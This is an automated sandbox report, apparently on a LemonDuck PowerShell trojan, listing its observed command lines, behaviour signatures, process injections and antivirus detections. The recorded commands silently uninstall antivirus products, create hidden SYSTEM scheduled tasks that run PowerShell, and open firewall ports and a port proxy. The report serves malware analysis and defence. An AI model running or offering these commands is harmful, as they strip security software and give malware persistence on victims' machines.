cmdline wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq
cmdline "C:\Windows\system32\schtasks.exe" /delete /tn t.pp6r1.com /F
wmi SELECT * FROM Win32_Product WHERE name like '%avast%'
wmi SELECT * FROM Win32_Product WHERE name like '%avp%'
wmi select * from __EventFilter where Name='blackball1'
wmi SELECT * FROM Win32_Product WHERE name like '%AntiVirus%'
wmi SELECT * FROM Win32_Product WHERE name like '%Eset%'
wmi SELECT * FROM Win32_Product WHERE name like '%Norton Security%'
wmi SELECT * FROM Win32_Product WHERE name like '%%Kaspersky%%'
wmi SELECT * FROM Win32_Product WHERE name like '%Security%'
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Steal credential rule local_credential_Steal
description File Downloader rule Network_Downloader
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Steal credential rule local_credential_Steal
description File Downloader rule Network_Downloader
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1
cmdline "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block
cmdline wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \802xIaZHLEP /F /tr "powershell -w hidden -c PS_CMD"
cmdline wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmdline wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmdline netsh.exe firewall add portopening tcp 65529 SDNSd
cmdline "C:\Windows\system32\schtasks.exe" /run /tn VIl8p0azRYG\gV7HWSKROT
cmdline "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
cmdline "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F
cmdline "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F
cmdline "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F
cmdline wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\schtasks.exe" /run /tn \802xIaZHLEP
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn VIl8p0azRYG\gV7HWSKROT /F /tr "powershell -w hidden -c PS_CMD"
cmdline "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq /F /tr "powershell -w hidden -c PS_CMD"
cmdline "C:\Windows\system32\cmd.exe" /c netsh.exe firewall add portopening tcp 65529 SDNSd
cmdline wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
cmdline wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
cmdline wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmdline "C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq
cmdline "C:\Windows\system32\schtasks.exe" /delete /tn t.pp6r1.com /F
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \802xIaZHLEP /F /tr "powershell -w hidden -c PS_CMD"
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn VIl8p0azRYG\gV7HWSKROT /F /tr "powershell -w hidden -c PS_CMD"
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq /F /tr "powershell -w hidden -c PS_CMD"
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
cmdline "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block
cmdline "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block
parent_process powershell.exe martian_process "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
parent_process powershell.exe martian_process "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
parent_process powershell.exe martian_process "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \802xIaZHLEP /F /tr "powershell -w hidden -c PS_CMD"
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
parent_process powershell.exe martian_process "C:\Windows\system32\schtasks.exe" /run /tn VIl8p0azRYG\gV7HWSKROT
parent_process powershell.exe martian_process "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
parent_process powershell.exe martian_process "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
parent_process powershell.exe martian_process "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F
parent_process powershell.exe martian_process "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F
parent_process powershell.exe martian_process "C:\Windows\system32\schtasks.exe" /run /tn \802xIaZHLEP
parent_process powershell.exe martian_process "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn VIl8p0azRYG\gV7HWSKROT /F /tr "powershell -w hidden -c PS_CMD"
parent_process powershell.exe martian_process "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block
parent_process powershell.exe martian_process "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq /F /tr "powershell -w hidden -c PS_CMD"
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c netsh.exe firewall add portopening tcp 65529 SDNSd
parent_process powershell.exe martian_process "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
parent_process powershell.exe martian_process "C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq
parent_process powershell.exe martian_process "C:\Windows\system32\schtasks.exe" /delete /tn t.pp6r1.com /F
Process injection Process 1980 resumed a thread in remote process 2168
Process injection Process 2820 resumed a thread in remote process 3040
Process injection Process 2836 resumed a thread in remote process 2452
Process injection Process 1500 resumed a thread in remote process 2756
Process injection Process 2716 resumed a thread in remote process 300
Process injection Process 1560 resumed a thread in remote process 2264
Process injection Process 2696 resumed a thread in remote process 2700
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2168
1 0 0

NtResumeThread

 thread_handle: 0x00000084
suspend_count: 0
process_identifier: 3040
1 0 0

NtResumeThread

 thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2452
1 0 0

NtResumeThread

 thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2756
1 0 0

NtResumeThread

 thread_handle: 0x00000084
suspend_count: 0
process_identifier: 300
1 0 0

NtResumeThread

 thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2264
1 0 0

NtResumeThread

 thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2700
1 0 0
option -w hidden value Attempts to execute command with a hidden window
option -w hidden value Attempts to execute command with a hidden window
option -w hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\cmd.exe
file C:\Windows\System32\schtasks.exe
file C:\Windows\System32\netsh.exe
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \802xIaZHLEP /F /tr "powershell -w hidden -c PS_CMD"
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn VIl8p0azRYG\gV7HWSKROT /F /tr "powershell -w hidden -c PS_CMD"
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq /F /tr "powershell -w hidden -c PS_CMD"
cmdline "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
ClamAV Ps1.Trojan.LemonDuck-9865458-0
CAT-QuickHeal PS1.Agent.41699
ALYac Heur.BZC.PZQ.Boxter.762.CDE52800
Arcabit Heur.BZC.PZQ.Boxter.762.CDE52800
Symantec ISB.Downloader!gen173
Kaspersky Trojan-Dropper.PowerShell.Compressed.b
BitDefender Heur.BZC.PZQ.Boxter.762.CDE52800
MicroWorld-eScan Heur.BZC.PZQ.Boxter.762.CDE52800
Ad-Aware Heur.BZC.PZQ.Boxter.762.CDE52800
Emsisoft Heur.BZC.PZQ.Boxter.762.CDE52800 (B)
DrWeb PowerShell.Packed.47
McAfee-GW-Edition PS/Agent.eb
FireEye Heur.BZC.PZQ.Boxter.762.CDE52800
Sophos Troj/PSDl-IK
Microsoft Trojan:Script/Sabsik.FL.B!ml
ZoneAlarm Trojan-Dropper.PowerShell.Compressed.b
GData Heur.BZC.PZQ.Boxter.762.CDE52800
McAfee PS/Agent.eb
MAX malware (ai score=81)
Tencent Win32.Trojan-dropper.Compressed.Lqfc
dead_host 192.168.56.1:445
dead_host 192.168.56.103:49499
dead_host 192.168.56.1:1433
dead_host 192.168.56.103:49243